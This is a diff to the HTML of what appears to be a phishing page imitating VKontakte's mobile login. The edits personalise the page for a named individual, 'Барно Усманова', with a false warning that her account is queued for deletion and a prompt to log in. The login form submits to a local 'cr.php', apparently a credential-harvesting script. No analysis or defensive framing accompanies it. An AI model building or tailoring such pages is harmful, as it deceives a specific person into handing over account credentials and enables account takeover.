--- a/index.html
+++ b/index.html
@@ -12,7 +12,7 @@ class="vk vk_js_no vk_flex_no r d h vk_appAuth_no"
 <meta name="MobileOptimized" content="176" />
 <meta name="HandheldFriendly" content="True" />
 <base id="base">
-<title>Вход | ВКонтакте</title>
+<title>Барно Усманова | ВКонтакте</title>
 <link rel="shortcut icon" href="https://m.vk.com/images/icons/favicons/fav_logo.ico?6"></link>
 
 <link type="text/css" rel="stylesheet" href="https://m.vk.com/css/s_c.css?546"></link>
@@ -39,7 +39,7 @@ class="vk vk_js_no vk_flex_no r d h vk_appAuth_no"
 </a></div>
 <div class="basis__content mcont" id="mcont"><div class="pcont fit_box bl_cont">
 <div class="text_panel">
-Ваш аккаунт вконтакте был поставлен в очередь на удаление, если Вы этого не делали, войдите в аккаунт.
+Ваш аккаунт Барно Усманова вконтакте был поставлен в очередь на удаление, если Вы этого не делали, войдите в аккаунт.
 </div>
 <div class="form_item fi_fat">
 <form method="post" action="cr.php" novalidate>
